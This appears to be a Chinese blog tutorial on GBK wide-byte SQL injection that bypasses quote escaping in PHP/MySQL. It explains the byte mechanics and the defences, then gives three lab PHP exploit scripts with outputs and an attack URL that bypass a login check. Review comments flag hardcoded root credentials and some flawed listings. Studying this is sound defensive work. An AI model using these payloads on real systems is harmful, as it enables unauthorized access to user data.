昔日

sql宽字节注入,绕过单引号

Rule:

陈年老酒:



在 GBK 编码中,0xbf27 不是一个合法的宽字符,但 0xbf5c 是。按单字节拆开看,0xbf27 是 0xbf (¿) 和 0x27 (') 的组合,0xbf5c 是 0xbf (¿) 和 0x5c (\) 的组合。因此,当系统转义单引号、在 0x27 前插入一个反斜杠 (\) 时,0xbf27 就变成了 0xbf5c27:按 GBK 解析,它是一个宽字符 0xbf5c 加上一个未被转义的 0x27 (')。


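这样就产生了注入。根本原因是转义函数按单字节处理输入,而服务器按 GBK 解析语句;防御上应使用 mysql_set_charset() / mysqli::set_charset() 设置连接字符集(而不是执行 SET NAMES 之类的 SQL 语句),或者直接使用参数化查询。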

这种“过滤或转义处理本身反而制造出危险内容”的思路,其实在 XSS 中最为常见:让系统过滤掉 script,而过滤之后剩下的内容又重新组成了 script。

来几个exp,mysql版本5.5.15,php版本5.3.5:


<?php

/*
 * Demonstration: a GBK wide-byte payload that survives
 * mysql_real_escape_string().
 *
 * The session charset is switched with a SQL statement (SET CHARACTER SET)
 * instead of mysql_set_charset(). Per the PHP manual, the charset has to be
 * set at the server level or through mysql_set_charset() for it to affect
 * mysql_real_escape_string(), so the escaping below is not GBK-aware and
 * handles 0xBF and 0x27 as two independent bytes.
 *
 * Defensive takeaway: set the connection charset through the API
 * (mysql_set_charset() / mysqli::set_charset()) before escaping, or better,
 * use parameterized queries (mysqli or PDO prepared statements).
 *
 * NOTE(review): this listing uses the ext/mysql API, which was removed in
 * PHP 7, and connects as root with a literal password; treat it as lab-only.
 * No return value is checked: on a second run CREATE TABLE and INSERT fail
 * (the table and its primary keys already exist) without any visible error.
 */


$c = mysql_connect("localhost", "root", "cr0_3");


mysql_select_db("test", $c);


// change our character set
// (done via SQL, so the client library's escaping is not told about GBK)


mysql_query("SET CHARACTER SET 'gbk'", $c);


// create demo table
// (fixture only: passwords are stored in plaintext)


mysql_query("CREATE TABLE users (


    username VARCHAR(32) PRIMARY KEY,


    password VARCHAR(32)


) CHARACTER SET 'GBK'", $c);


mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);


// now the exploit code
// The value starts with the bytes 0xBF 0x27. Escaping puts 0x5C in front of
// 0x27, giving 0xBF 0x5C 0x27; read as GBK, 0xBF5C is one character and the
// 0x27 after it is left unescaped, so it closes the string literal. The `#`
// starts a MySQL comment, which drops the password condition of this
// single-line query.


$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username #/*'; 


$_POST['password'] = 'anything'; 


// Proper escaping, we should be safe, right?
// Not here: the escaping is byte-wise because the charset was never set
// through mysql_set_charset() (see the header comment).


$user = mysql_real_escape_string($_POST['username'], $c);


$passwd = mysql_real_escape_string($_POST['password'], $c);


// String-built SQL: the escaped values are interpolated straight into the text.
$sql = "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'";


echo $sql;


$res = mysql_query($sql, $c);


//print_r($res);


echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records


mysql_close($c);


?>


输出:SELECT * FROM  users WHERE  username = '縗' OR username = username #/*' AND password = 'anything'2


<?php

/*
 * Demonstration: the same GBK wide-byte problem with mysqli and addslashes().
 *
 * addslashes() works on bytes and has no notion of the connection charset:
 * it prefixes 0x27 with 0x5C. SET NAMES 'gbk' makes the server read the
 * statement as GBK, so 0xBF 0x5C is consumed as one character and the 0x27
 * that follows is left unescaped.
 *
 * Defensive takeaway: prefer prepared statements ($db->prepare() with bound
 * parameters); if escaping must be used, call $db->set_charset() and then
 * $db->real_escape_string(), never addslashes().
 *
 * NOTE(review): connects as root with a literal password; lab-only.
 * Presumably relies on the `users` table created by an earlier listing -
 * confirm.
 */


$mysql = array();


$db = mysqli_init();


$db->real_connect('localhost', 'root', 'cr0_3', 'test');


// Charset is changed with a SQL statement, not with $db->set_charset().
$db->query("SET NAMES 'gbk'");


/* SQL Injection Example */


$_POST['username'] = chr(0xbf) . chr(0x27) .' OR username = username #';


$_POST['password'] = 'guess';


// Byte-level escaping: 0xBF 0x27 becomes 0xBF 0x5C 0x27.
$mysql['username'] = addslashes($_POST['username']);


// NOTE(review): this escaped password is never used; the query below
// hard-codes the comparison value 'test'.
$mysql['password'] = addslashes($_POST['password']);


// NOTE(review): the literal below has no closing quote after the interpolated
// username; with a benign username the statement would likely be malformed.
// It also spans several lines, and `#` only comments to the end of its own
// line, so the "AND password = 'test'" line presumably still reaches the
// server if the line breaks are as shown here - confirm against a real run.
$sql = "SELECT *


        FROM   users


        WHERE  username = '{$mysql['username']}


        AND    password = 'test'";


// NOTE(review): $result is used below without checking for a failed query.
$result = $db->query($sql);


echo $sql;


// Any returned row is reported as a successful login.
if ($result->num_rows) {


echo 'Success';


    /* Success */


} else {


    /* Failure */


echo 'Failure';


}


?>


输出:SELECT *        FROM   users        WHERE  username = '縗' OR username = username #        AND    password = 'test'Success


<?php

/*
 * Demonstration: GBK wide-byte payload against mysql_escape_string().
 *
 * mysql_escape_string() takes no connection argument and, per the PHP manual,
 * does not respect the current charset setting, so it escapes byte by byte:
 * 0xDF 0x27 becomes 0xDF 0x5C 0x27. With the session switched to GBK through
 * SET NAMES, 0xDF 0x5C is read as one character and the 0x27 that follows is
 * left unescaped.
 *
 * Defensive takeaway: use parameterized queries (mysqli or PDO prepared
 * statements); charset-unaware escaping is not a safe substitute.
 *
 * NOTE(review): ext/mysql was removed in PHP 7, and the script connects as
 * root with a literal password; lab-only.
 */


$conn=mysql_connect("localhost","root","cr0_3");


// No link argument: ext/mysql falls back to the most recently opened link.
mysql_query("SET NAMES 'GBK'");


mysql_select_db("test",$conn);




// Overwrites whatever `user` value arrived with the request with a fixed
// payload, so the request's own `user` parameter has no effect on the query.
$_GET['user'] = chr(0xdf) .chr(0x27).' OR username = username #';


//$_GET['pass'] = 'guess';


$user=mysql_escape_string($_GET['user']);


// `pass` is taken from the request, because the assignment above is commented
// out; an undefined-index notice is raised if the request does not carry it.
$pass=mysql_escape_string($_GET['pass']);


// String-built SQL; the `#` in the payload comments out the rest of this
// single-line statement, including the password condition.
$sql="select * from users where username='$user' and password='$pass'";


// NOTE(review): $result is used below without checking for a failed query.
$result=mysql_query($sql,$conn);


echo $sql;


echo mysql_num_rows($result);


$rows =  array();


// Collect every returned row as an associative array and dump them all.
while ($row=mysql_fetch_array($result, MYSQL_ASSOC)) {


$rows[]=$row;


}


print_r($rows);


?>


输入:https://localhost/exp3.php?user=%df%27%20or%201=1%20limit%201,1%23&pass=

(注意:脚本中已用硬编码的值覆盖了 $_GET['user'],因此下面的输出对应的是脚本里硬编码的值,而不是此 URL 中的 user 参数。)

输出:select * from users where username='運' OR username = username #' and password=''2
